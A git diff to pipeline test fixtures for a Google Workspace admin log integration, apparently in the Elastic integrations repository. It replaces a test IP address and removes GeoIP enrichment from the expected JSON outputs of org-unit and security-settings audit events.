"{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"UNASSIGN_CUSTOM_LOGO\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "UNASSIGN_CUSTOM_LOGO", "id": "1", @@ -584,7 +458,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -608,35 +482,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:24.815009Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"CREATE_ENROLLMENT_TOKEN\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", + "ingested": "2021-12-09T13:38:50.954894300Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"CREATE_ENROLLMENT_TOKEN\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "CREATE_ENROLLMENT_TOKEN", "id": "1", @@ -666,7 +522,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -690,35 +546,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:24.815010800Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"REVOKE_ENROLLMENT_TOKEN\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", + "ingested": "2021-12-09T13:38:50.954898500Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"REVOKE_ENROLLMENT_TOKEN\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "REVOKE_ENROLLMENT_TOKEN", "id": "1", @@ -748,7 +586,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -772,35 +610,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:24.815012800Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"CHROME_LICENSES_ALLOWED\",\"parameters\":[{\"name\":\"APPLICATION_NAME\",\"value\":\"app\"},{\"name\":\"CHROME_LICENSES_ALLOWED\",\"value\":\"EMPTY\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", + "ingested": "2021-12-09T13:38:50.954902700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"CHROME_LICENSES_ALLOWED\",\"parameters\":[{\"name\":\"APPLICATION_NAME\",\"value\":\"app\"},{\"name\":\"CHROME_LICENSES_ALLOWED\",\"value\":\"EMPTY\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "CHROME_LICENSES_ALLOWED", "id": "1", @@ -830,7 +650,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -854,35 +674,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:24.815014600Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"CREATE_ORG_UNIT\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", + "ingested": "2021-12-09T13:38:50.954906200Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"CREATE_ORG_UNIT\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "CREATE_ORG_UNIT", "id": "1", @@ -912,7 +714,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -936,35 +738,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:24.815035300Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"REMOVE_ORG_UNIT\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", + "ingested": "2021-12-09T13:38:50.954911Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"REMOVE_ORG_UNIT\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "REMOVE_ORG_UNIT", "id": "1", @@ -994,7 +778,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -1018,35 +802,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:24.815038400Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"EDIT_ORG_UNIT_DESCRIPTION\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", + "ingested": "2021-12-09T13:38:50.954916300Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"EDIT_ORG_UNIT_DESCRIPTION\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "EDIT_ORG_UNIT_DESCRIPTION", "id": "1", @@ -1076,7 +842,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -1098,35 +864,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:24.815040400Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"MOVE_ORG_UNIT\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", + "ingested": "2021-12-09T13:38:50.954921600Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"MOVE_ORG_UNIT\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "MOVE_ORG_UNIT", "id": "1", @@ -1156,7 +904,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -1178,35 +926,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:24.815042300Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"EDIT_ORG_UNIT_NAME\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", + "ingested": "2021-12-09T13:38:50.954926700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"EDIT_ORG_UNIT_NAME\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "EDIT_ORG_UNIT_NAME", "id": "1", @@ -1236,7 +966,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -1260,35 +990,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:24.815044200Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"REVOKE_DEVICE_ENROLLMENT_TOKEN\",\"parameters\":[{\"name\":\"FULL_ORG_UNIT_PATH\",\"value\":\"full/org/path\"}]}}", + "ingested": "2021-12-09T13:38:50.954931900Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"REVOKE_DEVICE_ENROLLMENT_TOKEN\",\"parameters\":[{\"name\":\"FULL_ORG_UNIT_PATH\",\"value\":\"full/org/path\"}]}}", "provider": "admin", "action": "REVOKE_DEVICE_ENROLLMENT_TOKEN", "id": "1", @@ -1318,7 +1030,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -1342,35 +1054,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:24.815046200Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"TOGGLE_SERVICE_ENABLED\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SERVICE_NAME\",\"value\":\"new\"}]}}", + "ingested": "2021-12-09T13:38:50.954937300Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"TOGGLE_SERVICE_ENABLED\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SERVICE_NAME\",\"value\":\"new\"}]}}", "provider": "admin", "action": 
"TOGGLE_SERVICE_ENABLED", "id": "1", diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-security.log b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-security.log index 1035f42a2fb..1a75621dca4 100644 --- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-security.log +++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-security.log 
@@ -1,24 +1,24 @@ -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"ALLOW_STRONG_AUTHENTICATION","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"ALLOW_SERVICE_FOR_OAUTH2_ACCESS","parameters":[{"name":"OAUTH2_SERVICE_NAME","value":"APPS_SCRIPT"},{"name":"ORG_UNIT_NAME","value":"org"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"DISALLOW_SERVICE_FOR_OAUTH2_ACCESS","parameters":[{"name":"OAUTH2_SERVICE_NAME","value":"APPS_SCRIPT"},{"name":"ORG_UNIT_NAME","value":"org"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"CHANGE_APP_ACCESS_SETTINGS_COLLECTION_ID","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"},{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} 
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"ADD_TO_TRUSTED_OAUTH2_APPS","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"OAUTH2_APP_ID","value":"id"},{"name":"OAUTH2_APP_NAME","value":"appname"},{"name":"OAUTH2_APP_TYPE","value":"CHROME_EXTENSION"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"REMOVE_FROM_TRUSTED_OAUTH2_APPS","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"OAUTH2_APP_ID","value":"id"},{"name":"OAUTH2_APP_NAME","value":"appname"},{"name":"OAUTH2_APP_TYPE","value":"CHROME_EXTENSION"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"BLOCK_ON_DEVICE_ACCESS","parameters":[{"name":"OAUTH2_SERVICE_NAME","value":"APPS_SCRIPT"},{"name":"ORG_UNIT_NAME","value":"org"}]}} 
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"CHANGE_TWO_STEP_VERIFICATION_ENROLLMENT_PERIOD_DURATION","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"CHANGE_TWO_STEP_VERIFICATION_FREQUENCY","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"CHANGE_TWO_STEP_VERIFICATION_GRACE_PERIOD_DURATION","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} 
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"CHANGE_TWO_STEP_VERIFICATION_START_DATE","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"CHANGE_ALLOWED_TWO_STEP_VERIFICATION_METHODS","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"ALLOWED_TWO_STEP_VERIFICATION_METHOD","value":"ONLY_SECURITY_KEY"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"TOGGLE_CAA_ENABLEMENT","parameters":[{"name":"NEW_VALUE","value":"new"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"CHANGE_CAA_ERROR_MESSAGE","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"ORG_UNIT_NAME","value":"org"}]}} 
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"CHANGE_CAA_APP_ASSIGNMENTS","parameters":[{"name":"APPLICATION_NAME","value":"app"},{"name":"CAA_ASSIGNMENTS_NEW","value":"new"},{"name":"CAA_ASSIGNMENTS_OLD","value":"old"},{"name":"GROUP_NAME","value":"group"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"UNTRUST_DOMAIN_OWNED_OAUTH2_APPS","parameters":[{"name":"ORG_UNIT_NAME","value":"org"}]}}
